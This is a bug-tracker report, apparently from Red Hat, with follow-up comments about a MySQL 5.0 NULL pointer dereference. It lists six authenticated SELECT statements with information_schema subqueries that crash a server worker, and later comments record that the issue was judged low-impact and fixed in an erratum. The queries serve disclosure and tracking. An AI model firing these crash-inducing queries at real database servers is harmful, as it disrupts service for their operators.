Description of problem:
A NULL pointer dereference occurs after issuing the SELECT statements below. Security impact is very limited, as only one worker crashes, leaving the server running and ready for service. Additionally, an attacker must be authenticated and permitted to execute arbitrary SELECT statements.

Version-Release number of selected component (if applicable):
Does not affect MySQL 4.

How reproducible:
Always, by an authenticated user.

Steps to Reproduce:
SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');

Actual results:
The session closes prematurely, fault message in the log file.

Expected results:
I expected it to crash. I like this section of a bug report.
The mysql 5.0.36/37 release notes mention something like twenty different crashing bugs fixed. What's your rationale for harping on this particular one?
tgl: a CVE. Pardon me for forgetting to mention it in the Summary.
Moving to security response parent bug; we only create tracking bugs once it has been decided we will fix this issue in a particular release.
Red Hat does not consider this to be a security issue. It requires an attacker to be authenticated and after triggering the crash the database server will restart and continue to service requests.
This issue was addressed in: Red Hat Enterprise Linux: http://rhn.redhat.com/errata/RHSA-2008-0364.html
Reporter changed to security-response-team by request of Jay Turner.